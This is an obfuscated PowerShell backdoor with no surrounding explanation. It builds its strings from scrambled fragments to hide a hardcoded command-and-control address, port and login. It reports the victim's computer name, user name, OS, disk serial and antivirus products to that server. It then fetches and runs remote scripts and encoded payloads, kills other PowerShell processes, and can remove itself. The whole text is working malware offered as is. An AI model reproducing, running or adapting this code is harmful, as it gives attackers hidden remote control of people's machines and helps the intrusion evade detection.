${6J`w8} =[tyPE]("{0}{4}{5}{2}{1}{3}"-f 'Sys','oc','YpROT','OLType','TEM.net.Secu','rIT') ; &("{1}{0}{2}" -f 'iAbL','Set-VaR','e') ("h"+"MN") ( [TYPe]("{5}{1}{3}{2}{0}{4}{6}"-F'icepoIntMAnag','t','T.sERv','eM.ne','e','SYS','R')) ; ${14Mx`Hi} = [tYPE]("{1}{0}" -F'ERT','CoNv') ; ${4`Kjp} = [TYpe]("{2}{3}{0}{1}"-f'.enc','odINg','sY','stEm.TeXt'); &("{1}{0}" -f 'm','SEt-iTE') ("VAri"+"AblE:61"+"i9") ( [tyPE]("{4}{0}{1}{3}{2}"-F'EM','.co','vERT','n','sYSt')) ; &("{0}{2}{1}" -f 's','item','et-') VAriable:ajqZ ( [tYpE]("{2}{3}{0}{1}" -f'iptBl','ocK','SC','r') ); ${Gl`ob`AL:_`hOst} = ("{0}{4}{2}{3}{1}" -f'%host%,147.1','1.24','.2','2','85') ${glO`Ba`l:`_PoRt} = ("{0}{1}"-f '31','11') ${GlOBa`L`:h`_iD} = ("{0}{1}"-f 'SvO','Nr_') + -join ((65..90) + (97..122) | &("{2}{3}{0}{1}"-f 'and','om','Ge','t-R') -Count 5 | &("{2}{0}{3}{1}" -f 'rEach','bject','Fo','-O') {[char]${_}}) ${GlObal`:`H_`P`ACk`AGE} = '<|>' ${GLo`BA`L:`h_Web} = ${N`UlL} ${GLo`BA`l:H_Sl`EEp} = 3 ${GlOBaL:`h_`in`FO} = ${nu`lL} ${GLoBaL`:`H_r`UnNiNg} = ${t`RUE} ${GLob`A`L:H_`Ip} = ${n`ULl} ${G`LoBa`l:H`_`ENDPoInT} = ("{0}{1}" -f 'api/ma','in') ${Gl`o`BAL`:H_`HasH} = ("{6}{1}{5}{3}{2}{0}{4}{7}" -f'2D64CC','8','F0C4F','F77','DBD84D18','4AD148D7C','D','6EE41D9') ${GloB`AL`:h`_A`UTH} = @{ ("{0}{1}"-f'us','er') = ("{0}{1}" -f 'Adm','in') ("{1}{0}"-f'ss','pa') = ("{1}{2}{0}{3}"-f'X','xA','533kvHGbeE','tBP') } ${G`LoBaL:m`oD`UL`Es} = @{ ("{1}{0}{2}" -f 'unni','r','ng') = ${F`A`lsE} ("{0}{1}" -f'l','ist') = ((("{8}{7}{2}{1}{6}{4}{9}{0}{3}{5}" -f 'nce','p','0}','{0}main.','ist','ps1','ers','{0}me{','.','e')) -f [CHaR]92) } ( &("{0}{1}" -f 'va','riABle') hmn -VAlUeon )::"sECu`R`ItyPr`O`ToCol" = ( &("{1}{2}{0}{3}" -f 'A','Get','-v','riABLE') 6jW8 -vaLueO )::"tl`s12"; function SSlPi`NNI`NG { param ([bool]${P`INNiNG}=${T`RUe}) if (${PinNI`NG}) { ${H`mN}::"sErvErceRTif`I`CAtE`V`A`LIdaTion`cALl`BACK" = { param(${_`Se`NdER},${_`ceRT`I`FIc`ATE},${_`ChA`iN},${_ss`L`p`OlICyErR`oRs}) ${r`EMOTE_H`Ash} = ${_c`eRtIFi`CatE}.("{2}{0}{3}{1}{4}" -f 'e','rtHashSt','G','tCe','ring').Invoke() if (${gl`o`B`Al:H_HAsH} -like ${Re`mOtE`_HASh}) { return ${t`RUe} } else { return ${fa`lsE} } } } else { ${H`Mn}::"SERve`R`cERTiFI`CA`TEV`ALI`DAtiOncA`l`lbaCK" = { return ${tr`UE} } } } function M`AIN { param () ${GlO`BaL:`h_in`Fo} = &("{2}{0}{1}{3}" -f'ma','ti','Infor','on') while (${gl`ob`Al:H_ru`Nn`INg}) { if (&("{0}{1}"-f'P','ostC2') "$global:h_endpoint/init") { &("{0}{1}{2}" -f 'L','oadMod','ules') } &("{2}{0}{3}{1}" -f'r','leep','Sta','t-S') -s ${Gl`obAL`:H_s`l`EEP} } } function LOADm`oDul`Es { param () if (-not ${G`LO`Ba`l:`mODUlEs}."R`UN`NIng") { &("{1}{0}" -f'C2','Post') "$global:h_endpoint/modules" (${g`loBAl`:MO`d`ULeS}."L`IST" -join "`r`n") | &("{2}{0}{1}" -f 'l','l','Out-Nu') } } function i`NFORm`AtioN { param () ${H_H`wid} = &("{2}{1}{3}{0}" -f 'stance','C','Get-','imIn') -Class ("{1}{2}{4}{0}{3}" -f's','win3','2_logica','k','ldi') -Filter ((("{6}{2}{0}{3}{4}{5}{1}"-f '=','C:gbx','iceID ',' g','b','x','Dev'))."re`Pl`Ace"('gbx',[StRING][chaR]39)) | &("{2}{0}{1}{3}"-f 'l','ect','Se','-Object') -ExpandProperty ("{4}{1}{3}{0}{2}{5}"-f 'l','umese','numb','ria','vol','er') ${h_`hwId} = ${h`_`hWid}.("{2}{1}{0}" -f'ace','l','rep').Invoke("`r`n","") ${h_`COmPU`TE`RNa`ME} = ${E`NV`:`C`oMPuTeRName} ${h_u`sER`Na`me} = ${e`Nv:u`SeR`Name} ${H_`OS} = &("{2}{3}{1}{0}"-f 'nce','Insta','Get','-Cim') -Class ("{4}{3}{0}{5}{1}{2}"-f 'r','t','em','in32_Ope','W','atingSys') | &("{1}{2}{0}"-f 't-Object','Sel','ec') -ExpandProperty ("{1}{0}{2}"-f'apt','c','ion') | &("{1}{0}{2}" -f '-Str','Out','ing') ${h`_OS} = ${H_`OS}.("{2}{1}{0}"-f'e','ac','repl').Invoke("`r`n","") ${h_veR`s`ION} = ("{1}{0}"-f '.0]','[V2') ${H`_EDR} = &("{2}{0}{1}{4}{3}" -f't-CimIns','tan','Ge','e','c') -Namespace ("{1}{5}{3}{0}{4}{2}" -f'curit','ro','2','/Se','yCenter','ot') -ClassName ("{1}{3}{2}{0}"-f'usProduct','Anti','ir','v') | &("{1}{2}{3}{0}"-f 'ect','Selec','t-Ob','j') -ExpandProperty ("{1}{2}{0}"-f 'e','d','isplaynam') | &("{2}{0}{1}" -f't-Str','ing','Ou') ${h`_E`DR} = ${H`_`EDr}.("{1}{0}{2}"-f'epla','r','ce').Invoke("`r`n"," - ") ${H`_s`PR`EAd} = '_' return ${h_`id} + '_' + ${H_`H`WiD} + ${h_`P`ACKAGe} + ${H`_c`oMpUt`Ern`AMe} + ${h_paCk`A`Ge} + ${h_user`N`Ame} + ${h`_P`ACkAGE} + ${h`_OS} + ${H_pa`cK`AGE} + ${h_Ve`RS`ion} + ${H_`Pac`k`Age} + ${H_`e`Dr} + ${H_p`AcK`AgE} + ${h_`S`pReAD} + ${H_p`AC`kAGe} } function po`sTC2 { param ( [String] ${q`U`ERy}, [String] ${Da`TA} = '' ) &("{1}{0}{2}" -f'nin','SSLPin','g') ${g`L`obal:`H_WEB} = &("{1}{0}{2}" -f 'ew','N','-Object') ("{3}{0}{2}{4}{1}"-f'em.Net.WebCl','t','i','Syst','en') ${GlObAl:`h_`w`EB}."en`Cod`iNg" = ${4`Kjp}::"UT`F8" try { ${G`lo`BaL:H`_WEb}."HEa`dErs"[("{1}{0}{2}" -f 'r-Agen','Use','t')] = ("{15}{11}{22}{3}{10}{24}{7}{25}{6}{13}{21}{12}{4}{17}{16}{19}{8}{23}{14}{18}{2}{0}{5}{20}{1}{9}" -f '/91.0.4','ar','me','a/5.0 (','WebKit/','472.124 S',' ','.0; ','TML, li','i/537.36','Wi','zi',' Apple','x','ko) Chr','Mo','.36','537','o',' (KH','af','64)','ll','ke Gec','ndows NT 10','Win64;') ${GLOba`l:h_`W`eB}."he`Ad`eRS"[("{0}{2}{1}"-f'Authori','ion','zat')] = ("{1}{0}" -f ' ','Basic') + ( &("{3}{1}{0}{2}" -f'IT','D','em','chiL') vArIABLe:61i9 )."va`lUE"::"t`OB`ASE`64StRInG"( ( &("{0}{1}"-f'vARIa','bLe') 4Kjp -VaLUeoNlY)::"A`ScII".("{2}{0}{1}" -f 'e','s','GetByt').Invoke(${Gl`O`Bal:H_a`UTH}."us`ER" + ":" + ${G`LOBaL:h`_aUtH}."pA`SS")); ${gL`Oba`L:H_`wEB}."HE`Ad`ERs"[("{1}{2}{0}"-f 'est-ID','X-Re','qu')] = ( &("{1}{0}{2}"-f 'hILDit','c','EM') VarIAble:14mXHI )."vA`lUe"::"T`oBasE6`4S`TRINg"( ${4`kJP}::"u`TF8".("{2}{1}{0}"-f 's','Byte','Get').Invoke(${gLobal:`h`_i`Nfo})) foreach (${IP} in ${_h`o`ST}.("{1}{0}"-f'plit','s').Invoke(',')) { if (${iP} -eq ("{2}{0}{1}"-f'ho','st%','%')) {continue} ${GLOBAl:`h`_`Ip} = ${I`P} ${U`RL} = ("{0}{2}{1}"-f'http','//','s:') + ${H`_IP} + ':' + ${_`PO`RT} + '/' + ${qU`eRY} try { ${RE`SPO`NsE} = ${Global:`H_`w`Eb}.("{1}{0}{2}{3}"-f 'o','Upl','adStr','ing').Invoke(${U`RL}, ${D`Ata}) if (${RESP`Onse}) {&("{0}{1}" -f'Parse','C2') ${rE`Sp`oNSE}} return ${tr`Ue} } catch { } } return ${F`AL`Se} } finally { if (${G`lob`AL:`h_WeB}) { ${Gl`Ob`Al:H_`weB}.("{1}{2}{0}" -f'e','dis','pos').Invoke() ${G`lo`BAL`:H_Web} = ${n`ULL} } } } function ExEC`PL`UgIN { param ( [String]${P`ARam_`Scri`pt}, [bool]${Pa`RA`M_p`lug`iN}=${Tr`Ue} ) ${SCr`I`pt_BlOCK} = ${A`JQZ}::("{2}{1}{0}" -f 'e','eat','Cr').Invoke( ${4`kjp}::"u`Tf8"."gETST`Ri`Ng"( ( &("{2}{1}{0}"-f'e','vARIABl','GET-') ("61i"+"9"))."vaL`Ue"::("{0}{5}{1}{3}{4}{2}" -f'Fr','mBa','ng','se6','4Stri','o').Invoke(${P`ARAM_Sc`R`I`Pt}))) if (${pARaM`_`plu`GiN}) { ${j`ob} = &("{1}{2}{0}"-f 'rt-Job','St','a') -ScriptBlock ${SC`RIpT_`BL`ocK} -ArgumentList ${gLoBal`:`H_`ip},${gLoBa`L`:_`Po`RT},${g`lOBAL:`h_`ID},${g`LOB`Al:`h_`AUTh} | &("{2}{1}{0}"-f'-Job','it','Wa') -Timeout 3 } else { ${j`ob} = &("{1}{0}{2}"-f'tart-Jo','S','b') -ScriptBlock ${s`CrIP`T_B`L`oCk} | &("{1}{0}" -f 'Job','Wait-') -Timeout 3 } if (${j`ob}."st`ATE" -eq ("{1}{0}" -f 'd','Faile')) { throw ${j`Ob}."Chi`ld`JoBs"[0]."jobstA`Tei`NFo"."rE`A`SON"."mEs`SagE" } } function c`LeaRP`oWERS`HE`ll { &("{1}{2}{0}{3}" -f 't-','G','e','Process') ("{0}{1}{3}{2}" -f 'p','o','ell','wersh') -ErrorAction ("{0}{1}{2}"-f 'Silent','lyCont','inue') | &("{1}{0}{2}" -f 'rEach','Fo','-Object') { if (${P`id} -ne ${_}."i`d") { &("{1}{0}{2}"-f 'roc','Stop-P','ess') -Force -Id ${_}."I`D" } } } function C`Le`Arjob { &("{0}{1}{2}"-f 'Get-J','o','b') | &("{2}{1}{0}" -f '-Job','ve','Remo') -Force } function pAR`s`ec2 { param ( [String]${dA`TA} ) try { ${D`A`Ta_St`REAm} = [System.IO.TextReader](&("{2}{1}{0}" -f'ect','w-obj','ne') ("{0}{1}{4}{5}{2}{3}" -f'System.','IO','ngRe','ader','.Str','i')(${dA`TA})) if (${DATA_S`T`Re`Am}."lEnG`TH" -gt 0) { ${Co`mm`ANd} = ${da`Ta_s`T`REam}.("{1}{0}{2}"-f 'eadLin','R','e').Invoke() switch (${cOm`Ma`Nd}.("{1}{2}{0}"-f 'wer','T','oLo').Invoke()) { ("{2}{1}{0}{3}"-f 'dule','o','main.m','s') { ${PA`R`Am_`MODUles} = ${DaT`A_st`ReaM}.("{2}{1}{0}" -f 'd','oEn','ReadT').Invoke(); if (${PARa`M`_m`OD`Ules}) { &("{0}{1}{2}"-f 'St','art-','Job') -ScriptBlock ( (&("{1}{0}{2}"-f 'Iabl','VaR','E') ajqZ)."Va`lue"::("{1}{0}" -f'te','Crea').Invoke(${pA`RaM_M`OD`UL`ES})) | &("{1}{2}{0}"-f 'll','Out-','Nu') ${GLo`BA`l`:`mOdUlEs}."rU`NninG" = ${tr`Ue} } break } ("{0}{1}{2}" -f'ma','in.plug','in') { ${pAR`Am_s`c`Ript} = ${Data_str`E`Am}.("{0}{2}{1}"-f 'Read','oEnd','T').Invoke(); if (${ParAm_`ScR`Ipt}) { &("{2}{0}{1}" -f 'xec','Plugin','E') ${Par`A`m_`ScRipt} } break } ("{3}{2}{0}{5}{1}{4}"-f'ute.','o','n.exec','mai','cal','l') { ${pAram_SC`Ri`PT} = ${DATA_`S`Tr`EAm}.("{0}{1}{2}"-f'Read','T','oEnd').Invoke(); if (${P`AR`Am_`ScRIPt}) { &("{1}{0}{2}"-f 'xecPlugi','E','n') ${PA`RAm_`ScRIPT} ${Fa`l`sE} } break } ("{0}{2}{1}{3}" -f'main','e.r','.execut','emote') { ${Par`Am`_Url} = ${d`AtA_St`R`EAm}.("{0}{1}{2}" -f 'Rea','dLi','ne').Invoke() if (${Pa`RaM_`URl}) { &("{0}{1}{2}" -f'S','SLPi','nning') ${f`AL`Se} ${P`AraM_`s`Cr`ipt} = (&("{0}{1}{2}" -f 'N','e','w-Object') ("{4}{2}{0}{3}{1}{5}" -f 'tem','et.Web','s','.N','sy','Client')).("{0}{2}{1}" -f 'downlo','ng','adStri').Invoke(${Pa`RAm`_uRL}) if (${paR`Am`_Sc`R`ipT}) { &("{0}{2}{1}" -f'Ex','n','ecPlugi') ${p`A`RaM`_scR`IpT} ${Fa`LsE} } } break } ("{0}{1}{2}"-f 'main.','s','leep') { ${p`A`RAm_MS} = ${DAta_ST`R`eam}.("{0}{1}" -f 'Read','Line').Invoke() &("{1}{0}{2}"-f 'a','St','rt-Sleep') -s (${P`A`RaM`_Ms} -as [int]) break } ("{2}{0}{3}{1}" -f'a','ar','m','in.cle') { &("{0}{1}{2}"-f 'C','learJ','ob') break } ("{1}{0}"-f 'n.exit','mai') { &("{4}{3}{1}{0}{2}"-f 'wer','Po','shell','lear','C') break } ("{4}{1}{3}{2}{0}"-f'all','ai','uninst','n.','m') { &("{4}{0}{3}{1}{2}"-f 'ar','l','l','Powershe','Cle') Exit(1) } } } } catch { ${Me`S`sAgE} = ${_}."ex`cePt`Ion"."MesS`A`ge" ${t`R`AcE} = ${_}."eX`CeP`T`Ion"."STAc`KTR`ACe" ${rE`SPoNse} = ("[exception]`r`nmessage "+'= '+"$message`r`ntrace "+'= '+"$trace") &("{1}{0}" -f'ostC2','P') "$global:h_endpoint/log" ${r`eSp`o`NSE} } } &("{0}{1}"-f 'M','ain')